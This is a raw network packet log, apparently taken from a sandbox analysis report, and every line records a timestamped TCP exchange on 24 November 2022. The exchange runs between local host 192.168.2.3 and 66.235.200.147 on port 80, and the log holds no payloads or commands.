Nov 24, 2022 12:20:03.415179968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415190935 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415214062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415220976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415247917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415252924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415278912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415287971 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415311098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415322065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415344954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415354013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415379047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415390968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415415049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415424109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415452957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415477991 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415487051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415513992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415534019 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415544033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415570021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415575027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415594101 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415596008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415621042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415621042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415637970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415653944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415690899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415697098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415730000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415770054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415777922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415807009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415813923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415836096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415869951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415889025 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415891886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415909052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415918112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415927887 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415947914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415947914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415966988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.415976048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.415985107 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416003942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416003942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416022062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416028976 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416047096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416054964 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416071892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416073084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416089058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416098118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416107893 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416122913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416145086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416148901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416171074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416208982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416229963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416248083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416254044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416271925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416273117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416290045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416297913 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416307926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416321039 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416328907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416348934 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416352987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416357040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416369915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416374922 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416388035 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416389942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416405916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416409016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416424990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416428089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416448116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416450024 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.416466951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.416486979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436295986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436330080 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436351061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436397076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436414957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436434031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436450958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436453104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436470032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436491966 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436511040 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436516047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436526060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436542034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436542034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436547041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436568975 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436589003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436589003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436608076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436614037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436625004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436625957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436645031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436665058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436685085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436711073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436717033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436717033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436717033 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436732054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436736107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436736107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436736107 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436749935 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436764002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436769009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436786890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436810017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436819077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436819077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436831951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436842918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436851978 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436868906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436870098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436888933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436902046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436908007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436925888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436930895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436930895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436943054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436945915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436956882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436960936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436970949 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.436976910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.436995029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437019110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437019110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437021017 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437033892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437041998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437060118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437060118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437078953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437082052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437096119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437108994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437114954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437133074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437136889 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437150955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437172890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437184095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437184095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437195063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437207937 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437213898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437232018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437239885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437251091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437271118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437273026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437273026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437288046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437302113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437319994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437334061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437334061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437342882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437355042 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437361956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437381983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437382936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437400103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437410116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437417984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437423944 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437434912 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437438011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437455893 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437475920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437483072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437484026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437499046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437500954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437516928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437530041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437537909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437555075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437557936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437572002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437572956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437585115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437591076 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437599897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437608957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437630892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437647104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437647104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437654018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437670946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437671900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437690973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437699080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437705994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437722921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437741995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437742949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437753916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437783957 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437803030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437825918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437845945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437860966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437871933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437872887 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437895060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437902927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437916994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437931061 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.437936068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437953949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437973022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.437999964 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438020945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438036919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438055038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438076019 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438095093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438112974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438133955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438152075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438170910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438189983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438209057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438221931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438221931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438221931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438221931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438221931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438226938 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438221931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438222885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438241959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438256979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438256979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438256979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438261032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438256979 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438278913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438304901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438308001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438308001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438323975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438325882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438344955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438352108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438364983 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438384056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438388109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438401937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438426971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438431025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438451052 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438457966 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438466072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438471079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438489914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438489914 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438507080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438508987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438529015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438534975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438545942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438564062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438570023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438577890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438580990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438596010 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438615084 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438618898 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438630104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438637972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438659906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438661098 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438678980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438678980 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438697100 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438705921 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438714981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438726902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438734055 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438749075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438759089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438766956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438781023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438796043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438800097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438806057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438821077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438822031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438838959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438839912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438863993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438893080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438903093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438920975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.438925028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438944101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438957930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438985109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.438988924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439007044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439018011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439026117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439042091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439045906 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439064980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439071894 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439083099 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439085960 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439101934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439104080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439120054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439122915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.439141989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.439141989 CET	49710	80	192.168.2.3	66.235.200.147
